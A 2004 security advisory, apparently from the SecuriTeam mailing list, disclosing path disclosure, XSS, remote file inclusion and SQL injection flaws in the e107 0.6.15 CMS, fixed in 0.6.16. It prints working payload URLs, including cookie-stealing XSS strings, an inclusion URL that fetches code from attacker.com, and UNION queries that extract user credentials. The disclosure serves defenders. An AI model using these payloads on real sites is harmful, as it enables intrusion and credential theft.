[UNIX] e107 Multiple Vulnerabilities (Path Disclosures, File Inclusions and SQL Injections)

• Previous message: SecuriTeam: "[NEWS] NETGEAR RP114 URL Filter Failure When URL Too Long"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: list@securiteam.com
Date: 30 May 2004 19:41:56 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -

  e107 Multiple Vulnerabilities (Path Disclosures, File Inclusions and SQL
Injections)
------------------------------------------------------------------------

SUMMARY

" <http://e107.org/> e107 is a portal / content management system powered
by PHP and MySQL that gives you a totally dynamic and professional website
out of the box. It's simple wizard type install process will have you up
and running in 5 minutes, and best of all it's completely free."

e107 is vulnerable to multiple types of attacks including: path
disclosures, file inclusions and SQL injections.

DETAILS

Vulnerable Systems:
 * e107 version 0.6.15, possibly prior

Immune Systems:
 * e107 version 0.6.16

In order to be able to exploit some of these vulnerabilities, the
following conditions must be met:
 * "register_globals" must be "on"
 * MySQL must be version 4.x with enabled UNION functionality (although on
some occasions one can work around this.)

Full Path Disclosure
Many software developers, webmasters, admins and other IT staff
underestimate full path disclosure as a security bug. They shouldn't, as
it gives valuable information to an attacker. Information that coupled
with other information gathering attacks can lead to a successful
compromise of a host.

This could be one of the reasons why many systems contain partial and full
path disclosure vulnerabilities. Usually this is possible because scripts
can be executed directly by the malicious user, resulting in a PHP error,
which tends to give ample information about the system.

Examples follow:
http://localhost/e107_0615/e107_plugins/alt_news/alt_news.php
http://localhost/e107_0615/e107_plugins/backend_menu/backend_menu.php
http://localhost/e107_0615/e107_plugins/clock_menu/clock_menu.php
http://localhost/e107_0615/e107_plugins/counter_menu/counter_menu.php
http://localhost/e107_0615/e107_plugins/login_menu/login_menu.php

Cross-site Scripting
Using XSS it is possible to steal credentials and cookies, read
cross-domain forms etc. An XSS vulnerability exists in the following
locations:

 * In 'clock_menu.php', the following example performs cross site
scripting:
http://localhost/e107_0615/e107_plugins/clock_menu/clock_menu.php?clock_flat=1&LAN_407=foo%22); //--%3E%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

 * In the "email article to a friend" featured, an XSS vulnerability
exists if the attacker is logged off and enters script code to the input
field, like so:
foobar'><body onload=a!ert(document.cookie);>

 * The same type of problem exists in the "submit news" feature:
foobar'><body onload=a!ert(document.cookie);>

 * In the user settings script, an attacker who is logged on issues a POST
request such as the following, which triggers an XSS:
http://localhost/e107_0615/usersettings.php?avmsg=[xss code here]

Remote File Inclusion
If PHP is configured with "allow_url_fopen=on" and there is no firewall
which blocks outbound traffic, then an attacker can force execution of PHP
code in the target host. This can lead to shell-level server compromise
(if there are permissions to execute system commands) with "nobody" or
"apache" privileges. If these are possible, local root exploits can be
executed and the server will be completely compromised. The problem is
located in the 'secure_img_render.php' script.

Example:
http://localhost/e107_0615/e107_handlers/secure_img_render.php?p=http://attacker.com/evil.php

Note: This requires that "register globals" be ON in order to be
effective.

SQL Injection
The following locations contain SQL injection bugs:

 * The 'content.php' script, which can be exploited in the following
manner:
http://localhost/e107_0615/content.php?content.99/**/UNION/**/SELECT/**/null, null, null,CONCAT(user_name,CHAR(58),user_email,CHAR(58),user_password), null, null, null, null, null, null, null, null, null/**/FROM/**/e107_user/**/WHERE/**/user_id=1/*

 * Another SQL injection in the same script but done differently:
http://localhost/e107_0615/content.php?query=content_id=99%20UNION%20select%20null, CONCAT(user_name,CHAR(58),user_email,CHAR(58),user_password), null, null, null, null, null, null, null, null, null, null, null%20FROM%20e107_user%20WHERE%20user_id=1/*

 * In the 'news.php' script:
http://localhost/e107_0615/news.php?list.99/**/UNION/**/SELECT/**/null,
null,CONCAT(user_name,CHAR(58),user_email,CHAR(58),user_password), null,
null, null, null, null, null, null, null,
null/**/FROM/**/e107_user/**/WHERE/**/user_id=1/*

Patch Availability:
The above-mentioned problems have been fixed in version 0.6.16. All users
of the system are highly encouraged to upgrade their version.

ADDITIONAL INFORMATION

The information has been provided by <mailto:come2waraxe@yahoo.com> Janek
Vind.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

• Previous message: SecuriTeam: "[NEWS] NETGEAR RP114 URL Filter Failure When URL Too Long"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Relevant Pages [NT] CA Secure Content Manager HTTP Gateway Service FTP Request Vulnerabilities ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... CA Secure Content Manager HTTP Gateway Service FTP Request Vulnerabilities ... An attacker can ... (Securiteam) [NT] Motorola Timbuktu Multiple Buffer Overflow Vulnerabilities ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Motorola Timbuktu Multiple Buffer Overflow Vulnerabilities ... Motorola Inc.'s Timbuktu Pro for Windows version 8.6.3.1367. ... attacker needs only the ability to initiate a session with the Timbuktu ... (Securiteam) [NT] ProjectForum Multiple Vulnerabilities ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... ProjectForum provides "a ... Two vulnerabilities have ... out dangerous characters that could enable an attacker to insert their own ... (Securiteam) [NT] Horde Multiple XSS ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... based on PHP and the Horde Framework." ... Horde is subject to a client side script injection vulnerability in the ... (Securiteam) [UNIX] Mantis Bug Tracker Multiple Vulnerabilities ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... any HTML or script code can be injected. ... * Another XSS vulnerability can be found in the signup.php script (ex.: ... there is also a remote PHP code execution in the system. ... (Securiteam)